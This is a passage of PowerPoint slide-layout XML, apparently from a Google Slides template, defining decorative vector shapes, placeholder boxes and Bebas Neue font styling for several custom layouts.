                    <a:pt x="251" y="2983"/>
                    <a:pt x="351" y="2983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="2983"/>
                    <a:pt x="502" y="2958"/>
                    <a:pt x="552" y="2907"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2933" y="527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3058" y="401"/>
                    <a:pt x="3058" y="201"/>
                    <a:pt x="2933" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="25"/>
                    <a:pt x="2789" y="0"/>
                    <a:pt x="2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 name="Google Shape;269;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="818699" y="4915675"/>
            <a:ext cx="616750" cy="78715"/>
            <a:chOff x="818699" y="4915675"/>
            <a:chExt cx="616750" cy="78715"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="270" name="Google Shape;270;p13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1356776" y="4915675"/>
              <a:ext cx="78673" cy="78715"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1880" h="1881" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="1088282" y="4915675"/>
              <a:ext cx="77627" cy="78715"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1855" h="1881" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1855" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="818699" y="4915675"/>
              <a:ext cx="78715" cy="78715"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1881" h="1881" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1880" y="1880"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18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 name="Google Shape;273;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="259675" y="4807625"/>
            <a:ext cx="425883" cy="216100"/>
            <a:chOff x="259675" y="4807625"/>
            <a:chExt cx="425883" cy="216100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="274" name="Google Shape;274;p13"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="538673" y="4807625"/>
              <a:ext cx="146885" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3510" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="399195" y="4807625"/>
              <a:ext cx="145797" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3484" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2105" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1353" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34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3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="259675" y="4807625"/>
              <a:ext cx="145839" cy="216100"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3485" h="5164" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2131" y="1"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1379" y="5164"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34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13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826474" y="3598354"/>
            <a:ext cx="2331000" cy="4698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2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>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278" name="Google Shape;278;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826486" y="4003657"/>
            <a:ext cx="2331000" cy="591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79" name="Google Shape;279;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="859800" y="3821100"/>
            <a:ext cx="539700" cy="469800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr>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280" name="Google Shape;280;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092999" y="3599918"/>
            <a:ext cx="2331000" cy="4698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2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>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281" name="Google Shape;281;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093011" y="3994111"/>
            <a:ext cx="2331000" cy="591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82" name="Google Shape;282;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="5" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5126400" y="3821100"/>
            <a:ext cx="539700" cy="469800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr>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283" name="Google Shape;283;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826474" y="1841350"/>
            <a:ext cx="2331000" cy="4698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2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>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284" name="Google Shape;284;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826486" y="2235544"/>
            <a:ext cx="2331000" cy="591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85" name="Google Shape;285;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="8" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="859800" y="2045175"/>
            <a:ext cx="539700" cy="469800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr>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286" name="Google Shape;286;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6092999" y="1841350"/>
            <a:ext cx="2331000" cy="4698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2000"/>
              <a:buFont typeface="Bebas Neue"/>
              <a:buNone/>
              <a:defRPr sz="2200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Bebas Neue"/>
                <a:ea typeface="Bebas Neue"/>
                <a:cs typeface="Bebas Neue"/>
                <a:sym typeface="Bebas Neue"/>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287" name="Google Shape;287;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6093011" y="2235544"/>
            <a:ext cx="2331000" cy="591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88" name="Google Shape;288;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="14" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5126400" y="2045175"/>
            <a:ext cx="539700" cy="469800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="3600"/>
              <a:buNone/>
              <a:defRPr>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289" name="Google Shape;289;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518250" y="447121"/>
            <a:ext cx="6412200" cy="5727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36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2">
  <p:cSld name="CUSTOM_33">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 536"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="537" name="Google Shape;537;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4180138" y="1249425"/>
            <a:ext cx="2729400" cy="1943100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="l"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538" name="Google Shape;538;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4180138" y="3192675"/>
            <a:ext cx="2729400" cy="701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39" name="Google Shape;539;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2246013" y="1929450"/>
            <a:ext cx="1261500" cy="1284600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="7200"/>
              <a:buNone/>
              <a:defRPr sz="9100">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="540" name="Google Shape;540;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="8559523" y="1128258"/>
            <a:ext cx="584466" cy="3281784"/>
            <a:chOff x="8559523" y="1128258"/>
            <a:chExt cx="584466" cy="3281784"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="541" name="Google Shape;541;p20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8559523" y="273560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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8623363" y="4301955"/>
              <a:ext cx="60380" cy="108087"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3335" h="5970" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2985" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2871" y="0"/>
                    <a:pt x="2763" y="70"/>
                    <a:pt x="2708" y="180"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="76" y="5519"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="5669"/>
                    <a:pt x="51" y="5870"/>
                    <a:pt x="201" y="5945"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="252" y="5970"/>
                    <a:pt x="302" y="5970"/>
                    <a:pt x="352" y="5970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="477" y="5970"/>
                    <a:pt x="577" y="5920"/>
                    <a:pt x="627" y="5794"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="3259" y="456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3334" y="306"/>
                    <a:pt x="3259" y="105"/>
                    <a:pt x="3109" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3068" y="10"/>
                    <a:pt x="3026" y="0"/>
                    <a:pt x="2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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9016004" y="2994926"/>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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8736973" y="19643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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9121267" y="3702904"/>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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9034598" y="1818952"/>
              <a:ext cx="22722" cy="22993"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1255" h="1270" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="603" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="446" y="0"/>
                    <a:pt x="295" y="72"/>
                    <a:pt x="176" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="216"/>
                    <a:pt x="126" y="241"/>
                    <a:pt x="101" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="317"/>
                    <a:pt x="51" y="342"/>
                    <a:pt x="51" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="417"/>
                    <a:pt x="1" y="467"/>
                    <a:pt x="1" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="542"/>
                    <a:pt x="1" y="592"/>
                    <a:pt x="1" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="793"/>
                    <a:pt x="51" y="968"/>
                    <a:pt x="176" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="1194"/>
                    <a:pt x="452" y="1269"/>
                    <a:pt x="628" y="1269"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="653" y="1269"/>
                    <a:pt x="703" y="1244"/>
                    <a:pt x="728" y="1244"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="778" y="1244"/>
                    <a:pt x="828" y="1219"/>
                    <a:pt x="853" y="1219"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="903" y="1194"/>
                    <a:pt x="928" y="1169"/>
                    <a:pt x="953" y="1144"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1003" y="1119"/>
                    <a:pt x="1029" y="1094"/>
                    <a:pt x="1054" y="1069"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="968"/>
                    <a:pt x="1254" y="793"/>
                    <a:pt x="1254" y="642"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1254" y="592"/>
                    <a:pt x="1229" y="542"/>
                    <a:pt x="1229" y="517"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1229" y="467"/>
                    <a:pt x="1204" y="417"/>
                    <a:pt x="1204" y="392"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1179" y="342"/>
                    <a:pt x="1154" y="317"/>
                    <a:pt x="1129" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1104" y="241"/>
                    <a:pt x="1079" y="216"/>
                    <a:pt x="1054" y="191"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1029" y="166"/>
                    <a:pt x="1003" y="141"/>
                    <a:pt x="953" y="116"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="928" y="91"/>
                    <a:pt x="903" y="66"/>
                    <a:pt x="853" y="41"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="828" y="41"/>
                    <a:pt x="778" y="16"/>
                    <a:pt x="728" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="686" y="5"/>
                    <a:pt x="644" y="0"/>
                    <a:pt x="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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8700096" y="3562403"/>
              <a:ext cx="55383" cy="54007"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3059" h="2983" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="2707" y="0"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="2626" y="0"/>
                    <a:pt x="2544" y="25"/>
                    <a:pt x="2482" y="75"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="126" y="2456"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="2582"/>
                    <a:pt x="0" y="2782"/>
                    <a:pt x="126" y="2907"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="2958"/>
                    <a:pt x="251" y="2983"/>
                    <a:pt x="351" y="2983"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="427" y="2983"/>
                    <a:pt x="502" y="2958"/>
                    <a:pt x="552" y="2907"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2933" y="527"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="3058" y="401"/>
                    <a:pt x="3058" y="201"/>
                    <a:pt x="2933" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2870" y="25"/>
                    <a:pt x="2789" y="0"/>
                    <a:pt x="2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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8578586" y="13822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0"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8996935" y="112825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20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-7" y="0"/>
            <a:ext cx="1295404" cy="3623066"/>
            <a:chOff x="-7" y="0"/>
            <a:chExt cx="1295404" cy="3623066"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="551" name="Google Shape;551;p20"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="-7" y="0"/>
              <a:ext cx="643914" cy="3623066"/>
              <a:chOff x="-7" y="0"/>
              <a:chExt cx="643914" cy="3623066"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="552" name="Google Shape;552;p20"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="201918" y="63821"/>
                <a:ext cx="72619" cy="101243"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="4011" h="5592" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="3663" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="3555" y="1"/>
                      <a:pt x="3449" y="56"/>
                      <a:pt x="3384" y="153"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="76" y="5090"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="5241"/>
                      <a:pt x="26" y="5441"/>
                      <a:pt x="176" y="5542"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="226" y="5567"/>
                      <a:pt x="276" y="5592"/>
                      <a:pt x="351" y="5592"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="452" y="5592"/>
                      <a:pt x="552" y="5542"/>
                      <a:pt x="602" y="5441"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3910" y="504"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="4011" y="354"/>
                      <a:pt x="3960" y="153"/>
                      <a:pt x="3835" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3782" y="17"/>
                      <a:pt x="3722" y="1"/>
                      <a:pt x="3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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="63976" y="15434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0"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="111628" y="3180578"/>
                <a:ext cx="60362" cy="108177"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst/>
                <a:ahLst/>
                <a:cxnLst/>
                <a:rect l="l" t="t" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="3334" h="5975" extrusionOk="0">
                    <a:moveTo>
                      <a:pt x="2984" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2870" y="1"/>
                      <a:pt x="2759" y="57"/>
                      <a:pt x="2707" y="160"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="75" y="5524"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="5674"/>
                      <a:pt x="75" y="5850"/>
                      <a:pt x="226" y="5925"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="276" y="5950"/>
                      <a:pt x="326" y="5975"/>
                      <a:pt x="351" y="5975"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="476" y="5975"/>
                      <a:pt x="577" y="5900"/>
                      <a:pt x="652" y="5800"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="3258" y="436"/>
                    </a:lnTo>
